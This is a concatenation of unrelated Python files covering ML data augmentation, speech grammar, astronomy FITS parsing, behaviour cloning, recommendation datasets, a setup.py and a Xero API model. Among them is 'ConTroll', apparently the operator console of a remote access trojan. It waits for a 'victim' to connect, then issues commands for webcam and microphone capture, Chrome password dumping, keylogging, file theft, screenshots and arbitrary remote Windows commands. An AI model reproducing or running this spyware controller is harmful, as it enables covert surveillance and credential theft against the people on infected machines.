ds (TensorFlow dataset): augmented dataset
"""
ds_noise = ds.map(lambda x,y: (x + tf.random.normal(x.shape, mean=0.0, stddev=sd, dtype=tf.float32), y))
ds_noise = ds_noise.map(lambda x,y: (tf.clip_by_value(x, 0.0, 1.0), y))
return ds_noise
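# A short usage sketch (not from the original code): build a tiny dataset of
# (image, label) pairs with float32 images in [0, 1] and chain a few of the
# augmentations above into one larger dataset.
if __name__ == "__main__":
    images = tf.random.uniform((8, 64, 64, 3))
    labels = tf.zeros((8,), dtype=tf.int32)
    ds = tf.data.Dataset.from_tensor_slices((images, labels))
    augmented = ds.concatenate(rotate_images(ds))
    augmented = augmented.concatenate(apply_gaussian_filter(ds))
    augmented = augmented.concatenate(add_noise(ds, sd=0.1))
    print(augmented.cardinality().numpy())  # 8 + 24 + 8 + 8 = 48 examples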
|
while True:
c = input('Digite o sexo [M/F] : ').strip().lower()
    if c in ('m', 'f'):
break
else:
print('Erro! Digite uma letra válida! ')
print(f'Você selecionou o sexo "{c.upper()}"')
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
##################################################
#
# make_fsg.py
#
# This module takes a text file, marked up with
# units (e.g. w for word, m for morpheme) and ids
# and converted to IPA, and outputs an FSG
# file for processing by PocketSphinx.
#
##################################################
from __future__ import absolute_import, division, print_function, unicode_literals
import argparse
import datetime
import os
import pystache
from readalongs.text.util import load_xml, save_txt
# ####################
#
# For making an FSG from a SMIL, we have the following rules:
#
# -- All children of a SEQ element are subject to alignment, in the order they
# occur.
#
# -- Only one TEXT child of a PAR element is subject to alignment, with a
# for the first child.
#
# -- a BODY element is treated exactly as a SEQ
#
#
# TODO: AP: Do we need this? It doesn't appear to be used anywhere.
# There's also an undefined variable error on line 90.
# TODO: Add numpy standard docstrings to functions
#########################
class GrammarComposite:
def __init__(self, id):
self.id = id
self.children = []
def append(self, child):
self.children.append(child)
def get_id_as_str(self):
return "<%s>" % self.id
class GrammarChoice(GrammarComposite):
def to_jsgf(self):
results = []
child_ids = " | ".join(c.get_id_as_str() for c in self.children)
results.append("%s = %s" % (self.get_id_as_str(), child_ids))
for child in self.children:
results += child.to_jsgf()
return results
class GrammarSequence(GrammarComposite):
def to_jsgf(self):
results = []
child_ids = " ".join(c.get_id_as_str() for c in self.children)
results.append("%s = %s" % (self.get_id_as_str(), child_ids))
for child in self.children:
results += child.to_jsgf()
return results
def make_sequence(seq_node):
for child in seq_node:
# TODO: flake8 flags child_id as an unused variable, and indeed, this function
# basically does nothing. Figure out what it's supposed to do and fix this
# function! -EJ
child_id = child.attrib["id"]
def make_jsgf(smil, unit="m"):
body_node = xpath_default(smil, ".//i:body")[0]
for child in body_node:
print(child.tag)
def main(input_filename, output_filename, unit):
smil = load_xml(input_filename)
jsgf = make_jsgf(smil, unit)
# save_txt(output_filename, jsgf)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Make an JSGF grammar from an XML file with IDs"
)
parser.add_argument("input", type=str, help="Input SMIL")
parser.add_argument("output_jsgf", type=str, help="Output .jsgf file")
parser.add_argument(
"--unit",
type=str,
default="m",
help="XML tag of the unit of analysis " '(e.g. "w" for word, "m" for morpheme)',
)
args = parser.parse_args()
    main(args.input, args.output_jsgf, args.unit)
|
import torch
if __name__ == '__main__':
generator = torch.Generator(device="cpu")
generator.manual_seed(1904)
print(torch.randint(0, 2, (10,),generator=generator))
print(torch.randint(0, 2, (10,),generator=None))
|
import socket, os, time
import cv2, numpy
banner ="""
( * ) ( (
)\ ` ) /( ( )\ )\
(((_) ( ( ( )(_)) )( ( ((_) ((_)
)\___ )\ )\ ) (_(_()) (()\ )\ _ _
((/ __| ((_) _(_/( |_ _| ((_) ((_) | | | |
| (__ / _ \ | ' \)) | | | '_| / _ \ | | | |
\___| \___/ |_||_| |_| |_| \___/ |_| |_|
(C) Start Conning and Trolling TODAY!!
FiRsT TiMe? TyPe \'CoN-mE\' fOr HeLp
"""
def functions():
print '\nNB: When connected to victim, you can run any windows commands remotely\neg. shutdown'
print '\n----------------------------------------------------------'
print '\t\tConTroll Options'
print '----------------------------------------------------------'
print 'start-trolling --> Wait for a victim to be hooked'
print 'stop-trolling --> Disconnect from victim'
print '----------------------------------------------------------'
print '\nUse these added Commands to Con/Troll the Victim\n'
print 'about --> Get information about victim\'s machine'
print 'activateWebcam --> Active Victim\'s webcam'
print 'activateMic --> Active Victim\'s microphone'
print 'chromeDump --> Steal saved passwords stored in chrome'
print 'getLogFile --> Get Keylogger file with logged keys'
print 'getRecording --> Retrieve microphone recording from victim'
print 'grab <arg> --> Grab a file from the victim\'s machine'
print 'kill --> Kill any process running on victim\'s machine'
print 'lockScreen --> Lock Victim\'s screen'
print 'openDrive --> Open\'s victim CD drive'
print 'screencap --> Get a screen shot of the victim\'s desktop'
print 'startLogger --> Start keylogger'
print 'speak--<text> --> Victim\'s machine talks with custom text passed'
print 'stopLogger --> Stop keylogger'
print '\ntroll--<Troll message>--<buttonCode+iconCode>--<Popup title>--<# of popus> --> Troll victim with pop ups\n'
print """button Codes - Icon Codes
0: Normal message box 16: Critical message icon
1: OK and Cancel 32: Warning query icon
2: Abort, Retry, Ignore 48: Warning message icon
3: Yes, No, Cancel 64: Information message icon
4: Yes and No 4096: Always on top of the desktop
5: Retry and Cancel
"""
def webCam(connection, command, ip_address):
connection.send(command)
while True:
soc = socket.socket()
soc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
soc.bind((ip_address, 9900)) #bind on all interface to port 9900
soc.listen(1) #listen for one connection
conn, addr = soc.accept() #accept connection
message = [] #variable to hold the data
while True:
d = conn.recv(1024 * 1024) #receive this much data
if not d: break
message.append(d)
data = ''.join(message) #assemble the entire data
numpy_data = numpy.fromstring(data, numpy.uint8) #convert to its original format
decimg = cv2.imdecode(numpy_data, 1) #read image from memory buffer(numpy_data)
cv2.imshow("Remote WebCam", decimg) #display image
if cv2.waitKey(5) == 27: break #close if user presses 'ESC'
cv2.destroyAllWindows()
def transfer(conn,command):
conn.send(command)
f = open('test.png','wb')
while True:
bits = conn.recv(1024)
if 'Unable to find out the file' in bits:
print '[-] Unable to find out the file'
break
if bits.endswith('DONE'):
print '[+] Transfer completed '
f.close()
break
elif bits.endswith('captured'):
print '[+] Transferring Screen Shot of Victim...'
time.sleep(2)
print '\n[+] Transfer completed '
f.close()
break
elif bits.endswith('LogSent'):
print '[+] Transferring KeyLog File...'
time.sleep(2)
print '\n[+] Transfer completed '
f.close()
break
elif bits.endswith('DumpSent'):
print '[+] Transferring Chrome Login Data File...'
time.sleep(2)
print '\n[+] Transfer completed '
f.close()
break
f.write(bits)
def transferChromeDump(conn,command):
conn.send(command)
f = open('ChromeLoginData.txt','wb')
while True:
bits = conn.recv(1024)
if 'Chrome Doesn\'t exists' in bits:
print '[-] Chrome Doesn\'t exists'
break
elif bits.endswith('DumpSent'):
print '[+] Transferring Chrome Login Data File...'
time.sleep(2)
print '\n[+] Transfer completed '
f.close()
break
f.write(bits)
def recordMic(conn,command):
conn.send(command)
f = open('audio.wav','wb')
while True:
bits = conn.recv(1024)
if bits.endswith('recordingSent'):
print '[+] Transferring Recoreded Audio...'
time.sleep(2)
print '\n[+] Transfer completed '
f.close()
break
f.write(bits)
def snapshot(conn,command):
conn.send(command)
f = open('snapshot.png','wb')
while True:
bits = conn.recv(1024)
if bits.endswith('snapSent'):
print '\n[+] Snap Taken '
f.close()
break
f.write(bits)
def connect(ip_address):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((ip_address, 8080))
s.listen(1)
print '[+] Listening for incoming TCP connection on port 8080'
conn, addr = s.accept()
print '[+] We got a connection from: ', addr
while True:
command = raw_input("Shell> ")
if 'stop-trolling' in command:
conn.send('terminate')
conn.close()
return 1
elif 'grab' in command:
transfer(conn,command)
elif 'screencap' in command:
transfer(conn, command)
elif 'getLogFile' in command:
transfer(conn, command)
elif 'CoN-mE' in command:
functions()
elif 'getWebcam' in command:
transfer(conn, command)
elif 'activateWebcam' in command:
webCam(conn, command, ip_address)
elif 'getRecording' in command:
recordMic(conn, command)
elif 'chromeDump' in command:
transferChromeDump(conn, command)
elif 'send' in command:
image = command.split(' ')
transferImage(conn, image[1], command)
elif 'snapshot' in command:
snapshot(conn, command)
elif 'cls' in command:
os.system('cls')
print banner
print '[+] Listening for incoming TCP connection on port 8080'
print '[+] We got a connection from: ', addr
elif 'troll' in command:
try:
call, msg, icons, title, times = command.split('--')
conn.send(command)
except:
print 'Usage troll--<Troll message>--<buttonCode+iconCode>--<Popup title>--<# of popus>\neg. troll--"You\'ve been p0wned"--0+16+4096--"trolled"--120\ntype \'CoN-mE\' for more information'
else:
conn.send(command)
print conn.recv(1024)
def main ():
os.system('cls')
print banner
while True:
cmd = raw_input('> ')
if cmd == 'CoN-mE':
functions()
elif cmd == 'start-trolling':
ip_address = raw_input('> IP Address: ')
if connect(ip_address) == 1:
os.system('cls')
print banner
print 'Hope You Had Fun!'
break
else:
main()
if __name__ == '__main__':
main()
|
#Ex02
dic = {}  # prepare an empty dictionary
while True:  # repeat indefinitely
    key = input("キーを入力してください: ")
    if key == "END":  # was "END" entered?
        break
    val = input("値を入力してください: ")
    dic[key] = val  # store (add) the key/value pair in the dictionary dic
# print the key/value pair for every key
for k, v in dic.items():
    print(k, v)
|
#!/usr/bin/env python
import astropy.io.fits as pyfits
import numpy as np
import sys
import datetime
import dateutil.parser
file=open("temperatures.txt","w")
skeys=["DAY","EXPNUM","TIME","HOUR","EXPREQ","BLUTEMP","REDTEMP","NIRTEMP","PLCTEMP1","PLCTEMP2","EXPSHUT","HARTL","HARTR","BLUHUMID","REDHUMID","NIRHUMID","RCCDTEMP1","RCCDTEMP2","ZCCDTEMP1","ZCCDTEMP2"]
line="#"
for k in skeys :
line=line+" %s"%k
file.write("%s\n"%line)
dtref=dateutil.parser.parse("2017-01-01T00:00:00.000000-05:00")
for filename in sys.argv[1:] :
h=pyfits.open(filename)
speckeys=h["SPECTCON1"].columns.names
if not "REDTEMP" in speckeys :
continue
d={}
d["EXPNUM"]=h[0].header["EXPNUM"]
d["EXPREQ"]=h[0].header["EXPREQ"]
dt = dateutil.parser.parse(h[0].header["DATE-OBS"])
d["DAY"]=int(dt.strftime('%Y%m%d'))
d["TIME"]=(dt.timestamp()-dtref.timestamp())
    offset=0 # I think the time zone is wrong here
d["HOUR"]=int(dt.strftime('%H'))+float(dt.strftime('%M'))/60.+float(dt.strftime('%S'))/3600.+offset
if "R1" in h :
d["RCCDTEMP1"]=h["R1"].header["CCDTEMP1"]
d["RCCDTEMP2"]=h["R1"].header["CCDTEMP2"]
else :
d["RCCDTEMP1"]=0.
d["RCCDTEMP2"]=0.
if "Z1" in h :
d["ZCCDTEMP1"]=h["Z1"].header["CCDTEMP1"]
d["ZCCDTEMP2"]=h["Z1"].header["CCDTEMP2"]
else :
d["ZCCDTEMP1"]=0.
d["ZCCDTEMP2"]=0.
if "PLC" in h :
temps=h["PLC"].header["TEMPS"].split(",")
d["PLCTEMP1"]=float(temps[0])
d["PLCTEMP2"]=float(temps[1])
else :
d["PLCTEMP1"]=0.
d["PLCTEMP2"]=0.
for k in ["BLUTEMP","REDTEMP","NIRTEMP","BLUHUMID","REDHUMID","NIRHUMID"] :
d[k]=h["SPECTCON1"].data[k][0]
d["EXPSHUT"]=int(h["SPECTCON1"].data["EXPSHUT"][0]=="CLOSED")
d["HARTL"]=int(h["SPECTCON1"].data["HARTL"][0]=="OPEN")
d["HARTR"]=int(h["SPECTCON1"].data["HARTR"][0]=="OPEN")
line=""
for k in skeys :
line=line+" %s"%str(d[k])
print(line)
    file.write("%s\n"%line)
    h.close()
file.close()
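# A possible way to load the table written above back into numpy (a sketch;
# the column order follows the `skeys` header line):
#
#     data = np.loadtxt("temperatures.txt")
#     day, expnum, seconds = data[:, 0], data[:, 1], data[:, 2]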
|
from collections import OrderedDict
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
from torch.utils.data.sampler import SubsetRandomSampler
from torch.optim.lr_scheduler import StepLR
from .base_agent import BaseAgent
from .expert_dataset import ExpertDataset
from ..networks import Actor
from ..utils.info_dict import Info
from ..utils.logger import logger
from ..utils.mpi import mpi_average
from ..utils.pytorch import (
optimizer_cuda,
count_parameters,
compute_gradient_norm,
compute_weight_norm,
sync_networks,
sync_grads,
to_tensor,
)
class BCAgent(BaseAgent):
def __init__(self, config, ob_space, ac_space, env_ob_space):
super().__init__(config, ob_space)
self._ob_space = ob_space
self._ac_space = ac_space
self._epoch = 0
self._actor = Actor(config, ob_space, ac_space, config.tanh_policy)
self._network_cuda(config.device)
self._actor_optim = optim.Adam(self._actor.parameters(), lr=config.bc_lr)
self._actor_lr_scheduler = StepLR(
self._actor_optim, step_size=self._config.max_global_step // 5, gamma=0.5,
)
if config.is_train:
self._dataset = ExpertDataset(
config.demo_path,
config.demo_subsample_interval,
ac_space,
use_low_level=config.demo_low_level,
sample_range_start=config.demo_sample_range_start,
sample_range_end=config.demo_sample_range_end,
)
if self._config.val_split != 0:
dataset_size = len(self._dataset)
indices = list(range(dataset_size))
split = int(np.floor((1 - self._config.val_split) * dataset_size))
                train_indices, val_indices = indices[:split], indices[split:]
train_sampler = SubsetRandomSampler(train_indices)
val_sampler = SubsetRandomSampler(val_indices)
self._train_loader = torch.utils.data.DataLoader(
self._dataset,
batch_size=self._config.batch_size,
sampler=train_sampler,
)
self._val_loader = torch.utils.data.DataLoader(
self._dataset,
batch_size=self._config.batch_size,
sampler=val_sampler,
)
            else:
                self._train_loader = torch.utils.data.DataLoader(
                    self._dataset, batch_size=self._config.batch_size, shuffle=True
                )
                self._val_loader = None
self._log_creation()
def _log_creation(self):
if self._config.is_chef:
logger.info("Creating a BC agent")
logger.info("The actor has %d parameters", count_parameters(self._actor))
def state_dict(self):
return {
"actor_state_dict": self._actor.state_dict(),
"actor_optim_state_dict": self._actor_optim.state_dict(),
"ob_norm_state_dict": self._ob_norm.state_dict(),
}
def load_state_dict(self, ckpt):
self._actor.load_state_dict(ckpt["actor_state_dict"])
self._ob_norm.load_state_dict(ckpt["ob_norm_state_dict"])
self._network_cuda(self._config.device)
self._actor_optim.load_state_dict(ckpt["actor_optim_state_dict"])
optimizer_cuda(self._actor_optim, self._config.device)
def _network_cuda(self, device):
self._actor.to(device)
def sync_networks(self):
sync_networks(self._actor)
def train(self):
train_info = Info()
for transitions in self._train_loader:
_train_info = self._update_network(transitions, train=True)
train_info.add(_train_info)
self._epoch += 1
self._actor_lr_scheduler.step()
train_info.add(
{
"actor_grad_norm": compute_gradient_norm(self._actor),
"actor_weight_norm": compute_weight_norm(self._actor),
}
)
train_info = train_info.get_dict(only_scalar=True)
logger.info("BC loss %f", train_info["actor_loss"])
return train_info
def evaluate(self):
if self._val_loader:
eval_info = Info()
for transitions in self._val_loader:
_eval_info = self._update_network(transitions, train=False)
                eval_info.add(_eval_info)
self._epoch += 1
return eval_info.get_dict(only_scalar=True)
logger.warning("No validation set available, make sure '--val_split' is set")
return None
def _update_network(self, transitions, train=True):
info = Info()
# pre-process observations
o = transitions["ob"]
o = self.normalize(o)
# convert double tensor to float32 tensor
_to_tensor = lambda x: to_tensor(x, self._config.device)
o = _to_tensor(o)
ac = _to_tensor(transitions["ac"])
if isinstance(ac, OrderedDict):
ac = list(ac.values())
if len(ac[0].shape) == 1:
ac = [x.unsqueeze(0) for x in ac]
ac = torch.cat(ac, dim=-1)
# the actor loss
pred_ac, _ = self._actor(o)
if isinstance(pred_ac, OrderedDict):
pred_ac = list(pred_ac.values())
if len(pred_ac[0].shape) == 1:
pred_ac = [x.unsqueeze(0) for x in pred_ac]
pred_ac = torch.cat(pred_ac, dim=-1)
diff = ac - pred_ac
actor_loss = diff.pow(2).mean()
info["actor_loss"] = actor_loss.cpu().item()
info["pred_ac"] = pred_ac.cpu().detach()
info["GT_ac"] = ac.cpu()
diff = torch.sum(torch.abs(diff), axis=0).cpu()
for i in range(diff.shape[0]):
info["action" + str(i) + "_L1loss"] = diff[i].mean().item()
if train:
# update the actor
self._actor_optim.zero_grad()
actor_loss.backward()
# torch.nn.utils.clip_grad_norm_(self._actor.parameters(), self._config.max_grad_norm)
sync_grads(self._actor)
self._actor_optim.step()
return mpi_average(info.get_dict(only_scalar=True))
|
import pickle
import time
import numpy as np
import copy
import os
import random
from constants import *
# data
# user_id \t os_name \t search_record1 \t search_record2 \t ...
# search_record: time_poiid_poiloc_poiname_poitype_userloc_network
"""
step3: make the final dataset files for transfer learning process and meta-learning.
For meta-learning, the output is 'mtrain_tasks.pkl' 'mvalid_tasks.pkl' 'mtest_tasks.pkl'
"""
start = time.time()
def timestr_to_timeid(timestr):
if len(timestr) > 5:
return time.strptime(timestr, "%Y-%m-%d %H:%M:%S").tm_hour+1 # 1~24
else: # when timestr is the default value: '\\N'
return 0
def timestr_to_timestamp(timestr):
return int(time.mktime(time.strptime(timestr, '%Y-%m-%d %H:%M:%S')))
def cal_distance(coo1, coo2):
x1, y1 = coo1[1:-1].split(",")
x2, y2 = coo2[1:-1].split(",")
dist = (float(x1) - float(x2)) ** 2 + (float(y1) - float(y2)) ** 2
if dist > 1e7:
dist = 1e7
return dist
def cal_dtime(last_timestr, timestr):
last_timestamp = timestr_to_timestamp(last_timestr)
timestamp = timestr_to_timestamp(timestr)
dtime = timestamp - last_timestamp
return dtime
def get_mean_std(arr):
arr = np.array(arr)
mean = np.mean(arr)
std = np.std(arr)
return mean, std
def record_to_datapoint(record):
record = record.split("_")
datapoint = [int(record[1]), int(record[4]), timestr_to_timeid(record[0])]
return datapoint, record[0], record[2], record[-2] # [poiid, poitype, timeid], timestr, poi_loc, user_loc
def pad_one_seq(x, max_context):
context_element_len = len(x[0])
ret = [ [0]*context_element_len ] * (max_context-len(x)) + x
return np.array(ret)[-max_context:]
def get_user_num(dataset):
if "meta_training" in dataset:
return TRAIN_USER_NUM
else:
return TEST_USER_NUM
def read_dataset(dataset, min_hist=MIN_HIST):
task_user2samples = {} # all real samples of this task, each sample is a numpy array as [uid, hist, candi, label] (label always =1)
task_candidates = set() # all the tuple of (POI id, POI type) in this task
user2itemset = {} # key: each user in this task, value: a set() of all POI id he/she has clicked.
dists = []
dtimes = []
user_num = get_user_num(dataset)
with open(split_path + dataset, 'r', encoding='utf-8') as fin:
for cnt, line1 in enumerate(fin):
if cnt >= user_num:
break
arr1 = line1.strip().split("\t") # each line is a sequence for a user
uid = int(arr1.pop(0))
arr1.pop(0) # skip os_name
user2itemset[uid] = set()
context = []
user_loc_context = []
last_timestr = "NULL"
for i in range(0, len(arr1)):
datapoint, timestr, poi_loc, user_loc = record_to_datapoint(arr1[i])
dist = cal_distance(poi_loc, user_loc)
dists.append(dist)
if i == 0:
context.append(datapoint + [dist, 0]) # poi id, poi type, timeid, dist, dtime
else:
dtime = cal_dtime(last_timestr, timestr)
dtimes.append(dtime)
context.append(datapoint + [dist, dtime])
candi_tuple = tuple([datapoint[0], datapoint[1], poi_loc]) # poi id, poi type, poi loc
task_candidates.add(candi_tuple)
user2itemset[uid].add(candi_tuple)
last_timestr = timestr
user_loc_context.append(user_loc)
for j in range(0, len(arr1) - min_hist):
hist = np.array(pad_one_seq(context[0:min_hist+j], MAX_HIST), dtype='int32')
candi = np.array(context[min_hist+j], dtype='int32')
sample = np.array([uid, hist, candi, user_loc_context[min_hist+j], 1]) # sample: user, history, candidate (poiid, poitype, timeid, u-pdist, dtime), user_location(str), label
if uid in task_user2samples:
task_user2samples[uid].append(sample)
else:
task_user2samples[uid] = [sample]
task_candidates = list(task_candidates)
mean_stds = {}
mean_stds["dist"] = mean_dist, std_dist = get_mean_std(dists)
mean_stds["dtime"] = mean_dtime, std_dtime = get_mean_std(dtimes)
# print(mean_stds)
data = task_user2samples, task_candidates, user2itemset, mean_stds
# pickle.dump(data, open(the_data_file, 'wb'), protocol=4)
return data
def read_transfer_data(datasets, neg_num=1, min_hist=MIN_HIST, is_test_qry=False):  # min_hist distinguishes the history length of support (spt) vs. query (qry) samples
for i in range(len(datasets)):
city = datasets[i].split('_')[0]
# print("city:", city)
task_user2pos_samples, task_candidates, user2itemset, mean_stds = read_dataset(datasets[i], min_hist)
# print("# task_candidates:", len(task_candidates))
user_list = []
history_list = []
candidate_list = []
label_list = []
test_qry_samples = [] # this is for the alignment of evaluations for trasfer learning and meta-learning methods.
for user in task_user2pos_samples:
for pos_sample in task_user2pos_samples[user]:
user_id, hist, pos_candi, user_loc, label = pos_sample
for k in range(1 + neg_num):
user_list.append(user_id)
history_list.append(hist)
candidate_list.append(pos_candi)
label_list.append(1)
neg_candis = []
neg_qry_samples = []
for k in range(neg_num):
neg_candi = random.choice(task_candidates)
while neg_candi in user2itemset[user_id] or neg_candi in neg_candis:
neg_candi = random.choice(task_candidates)
neg_candis.append(neg_candi) # tuple (poiid, poitype, poiloc)
poiid, poitype, poi_loc = neg_candi
# candidate (poiid, poitype, timeid, u-pdist, dtime)
neg_candi = np.array([poiid, poitype, pos_candi[2], cal_distance(poi_loc, user_loc), pos_candi[4]])
candidate_list.append(neg_candi)
label_list.append(0)
if is_test_qry:
neg_qry_samples.append(np.array([user_id, hist, neg_candi, 0]))
if is_test_qry:
pos_sample = user_id, hist, pos_candi, label
test_qry_samples.extend([pos_sample] + neg_qry_samples)
if is_test_qry:
pickle.dump(test_qry_samples, open(split_path + city + "_test_qry_samples.pkl", 'wb'), protocol=4)
pickle.dump(mean_stds, open(save_path + city + "_mean_stds.pkl", 'wb'), protocol=4)
yield np.array(user_list, dtype='int32'), np.array(history_list, dtype='int32'), \
np.array(candidate_list, dtype='int32'), np.array(label_list, dtype='int32')
def save_train_and_valid(data, city, mode, valid_ratio=0.05):
x_train_uid, x_train_history, x_train_candi, y_train = data
train_filename = "{}_{}_train.pkl".format(city, mode)
valid_filename = "{}_{}_dev.pkl".format(city, mode)
TRAIN_SAMPLE_NUM = int(len(x_train_uid) * (1 - valid_ratio))
pickle.dump([x_train_uid[:TRAIN_SAMPLE_NUM], x_train_history[:TRAIN_SAMPLE_NUM], x_train_candi[:TRAIN_SAMPLE_NUM],
y_train[:TRAIN_SAMPLE_NUM]], open(save_path + train_filename, 'wb'), protocol=4)
pickle.dump([x_train_uid[TRAIN_SAMPLE_NUM:], x_train_history[TRAIN_SAMPLE_NUM:], x_train_candi[TRAIN_SAMPLE_NUM:],
y_train[TRAIN_SAMPLE_NUM:]], open(save_path + valid_filename, 'wb'), protocol=4)
def save_test(data, city):
x_test_uid, x_test_history, x_test_candi, y_test = data
test_filename = "{}_target_test.pkl".format(city)
pickle.dump([x_test_uid, x_test_history, x_test_candi, y_test], open(save_path + test_filename, 'wb'), protocol=4)
def generate_base_cities(cities):
datasets = list(map(lambda x: x + "_meta_training_query.txt", cities))
for i, data in enumerate(read_transfer_data(datasets, neg_num=1)):
save_train_and_valid(data, cities[i], 'base')
def generate_valid_cities_as_train(cities):
spt_datasets = list(map(lambda x: x + "_meta_testing_support.txt", cities))
qry_datasets = list(map(lambda x: x + "_meta_testing_query.txt", cities))
data_collect = [[] for i in range(len(cities))]
for i, data in enumerate(read_transfer_data(spt_datasets, neg_num=1)):
data_collect[i].append(data)
for i, data in enumerate(read_transfer_data(qry_datasets, neg_num=1, min_hist=MIN_HIST+SPT_SIZE)):
data_collect[i].append(data)
for i in range(len(cities)):
spt_data, qry_data = data_collect[i]
data = []
for j in range(4): # x_train_uid, x_train_history, x_train_candi, y_train = data
            data.append(np.concatenate([spt_data[j], qry_data[j]], axis=0))
save_train_and_valid(data, cities[i], 'base')
def generate_target_cities(cities):
spt_datasets = list(map(lambda x: x + "_meta_testing_support.txt", cities))
qry_datasets = list(map(lambda x: x + "_meta_testing_query.txt", cities))
for i, data in enumerate(read_transfer_data(spt_datasets, neg_num=1)):
save_train_and_valid(data, cities[i], 'target')
for i, data in enumerate(read_transfer_data(qry_datasets, neg_num=100, min_hist=MIN_HIST+SPT_SIZE, is_test_qry=True)):
save_test(data, cities[i])
def read_meta_training_data(cities):
spt_datasets = list(map(lambda x: x + "_meta_training_support.txt", cities))
qry_datasets = list(map(lambda x: x + "_meta_training_query.txt", cities))
mtrain_tasks = []
for i in range(len(cities)):
spt_user2samples, spt_candidates, spt_user2itemset, spt_mean_stds = read_dataset(spt_datasets[i])
qry_user2samples, qry_candidates, qry_user2itemset, qry_mean_stds = read_dataset(qry_datasets[i], min_hist=MIN_HIST+SPT_SIZE)
task_candidates = list(set(spt_candidates) | set(qry_candidates))
mtrain_tasks.append((spt_user2samples, qry_user2samples, task_candidates, qry_user2itemset, qry_mean_stds, cities[i]))
return mtrain_tasks
def read_meta_testing_data(cities, is_test=False):
spt_datasets = list(map(lambda x: x + "_meta_testing_support.txt", cities))
qry_datasets = list(map(lambda x: x + "_meta_testing_query.txt", cities))
mtest_tasks = []
for i in range(len(spt_datasets)):
spt_user2samples, spt_candidates, spt_user2itemset, spt_mean_stds = read_dataset(spt_datasets[i])
qry_user2samples, qry_candidates, qry_user2itemset, qry_mean_stds = read_dataset(qry_datasets[i], min_hist=MIN_HIST+SPT_SIZE)
task_candidates = list(set(spt_candidates) | set(qry_candidates))
if is_test:
city = cities[i]
align_qry_samples = pickle.load(open(split_path + city + "_test_qry_samples.pkl", 'rb'))
mtest_tasks.append((spt_user2samples, qry_user2samples, task_candidates, qry_user2itemset, qry_mean_stds, cities[i], align_qry_samples))
else:
mtest_tasks.append((spt_user2samples, qry_user2samples, task_candidates, qry_user2itemset, qry_mean_stds, cities[i]))
return mtest_tasks
def generate_trans():
generate_base_cities(base_cities)
generate_target_cities(target_cities)
generate_valid_cities_as_train(valid_cities)
def generate_meta():
pickle.dump(read_meta_training_data(base_cities), open(save_path + "mtrain_tasks.pkl", 'wb'), protocol=4)
pickle.dump(read_meta_testing_data(valid_cities), open(save_path + "mvalid_tasks.pkl", 'wb'), protocol=4)
pickle.dump(read_meta_testing_data(target_cities, is_test=True), open(save_path + "mtest_tasks.pkl", 'wb'), protocol=4)
if not os.path.exists(save_path):
os.mkdir(save_path)
base_cities = get_cities('base')
valid_cities = get_cities('valid')
target_cities = get_cities('target')
print("generate the final dataset for transfer methods.")
generate_trans()
print("generate the final dataset for meta-learning methods.")
generate_meta()
end = time.time()
print("cost time:", (end-start)/60, "min")
|
"""
Copyright 2020 Lightbend Inc.
Licensed under the Apache License, Version 2.0.
"""
import os
import pathlib
from setuptools import find_packages, setup
# Load version in akkaserverless package.
from setuptools.command.build_py import build_py
exec(open("akkaserverless/version.py").read())
PROTOBUF_VERSION = "master"
version = __version__ # noqa
name = "akkaserverless"
print(f"package name: {name}, version: {version}", flush=True)
proto_lib_roots = ["akkaserverless"]
#proto_roots = ["akkaserverless"]
class FetchBuildProtosCommand(build_py):
"""fetch libs and install the protocol buffer generated sources."""
def run(self):
os.system(f"scripts/prepare.sh {PROTOBUF_VERSION}")
for proto_root in proto_lib_roots:
for root, subdirs, files in os.walk(proto_root):
for file in [f for f in files if f.endswith(".proto")]:
file_path = pathlib.Path(root) / file
destination = "."
print(f"compiling {file_path} to {destination}")
command = f"python -m grpc_tools.protoc {' '.join([' -I ' + i for i in proto_lib_roots])} --python_out={proto_root} --grpc_python_out={proto_root} {file_path}" # noqa
os.system(command)
                    # hack: rewrite the generated imports so the modules resolve inside the package
file_wo_ext = str(file_path).replace(".proto", "")
command = f"perl -i -pe 's/from akkaserverless/from akkaserverless.akkaserverless/g' {file_wo_ext}_pb2.py"
os.system(command)
command = f"perl -i -pe 's/from akkaserverless/from akkaserverless.akkaserverless/g' {file_wo_ext}_pb2_grpc.py"
os.system(command)
return super().run()
packages = find_packages(exclude=[])
print(f"packages: {packages}")
setup(
name=name,
version=version,
url="https://github.com/jpollock/akkaserverless-python-sdk",
license="Apache 2.0",
description="Akka Serverless Python Support Library",
packages=packages,
    package_data={
        "": ["*.proto"],
    },
#long_description=open("Description.md", "r").read(),
#long_description_content_type="text/markdown",
zip_safe=False,
scripts=["bin/fetch-akkaserverless-pb.sh", "bin/compile.sh", "bin/prepare.sh", "bin/start.sh", "bin/docker_build.sh", "bin/docker_push.sh"],
install_requires=[
"attrs>=19.3.0",
"google-api>=0.1.12",
"googleapis-common-protos >= 1.51.0",
"grpcio>=1.31.0",
"grpcio-tools>=1.31.0",
"protobuf>=3.11.3",
"pytest>=6.2.4",
"six>=1.14.0",
"grpcio-reflection>=1.31.0",
"docker",
],
cmdclass={
"build_py": FetchBuildProtosCommand,
},
)
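# Note: the proto fetch/compile step above is wired in through `cmdclass`, so it
# runs as part of a normal build. A minimal usage sketch (the commands below are
# illustrative, not part of this file):
#
#   python setup.py build_py   # invokes FetchBuildProtosCommand.run()
#   pip install .              # same effect via the build_py hook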
|
# coding: utf-8
"""
Xero Payroll AU API
This is the Xero Payroll API for orgs in Australia region. # noqa: E501
Contact: api@xero.com
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
from xero_python.models import BaseModel
class SuperFunds(BaseModel):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {"super_funds": "list[SuperFund]"}
attribute_map = {"super_funds": "SuperFunds"}
def __init__(self, super_funds=None): # noqa: E501
"""SuperFunds - a model defined in OpenAPI""" # noqa: E501
self._super_funds = None
self.discriminator = None
if super_funds is not None:
self.super_funds = super_funds
@property
def super_funds(self):
"""Gets the super_funds of this SuperFunds. # noqa: E501
:return: The super_funds of this SuperFunds. # noqa: E501
:rtype: list[SuperFund]
"""
return self._super_funds
@super_funds.setter
def super_funds(self, super_funds):
"""Sets the super_funds of this SuperFunds.
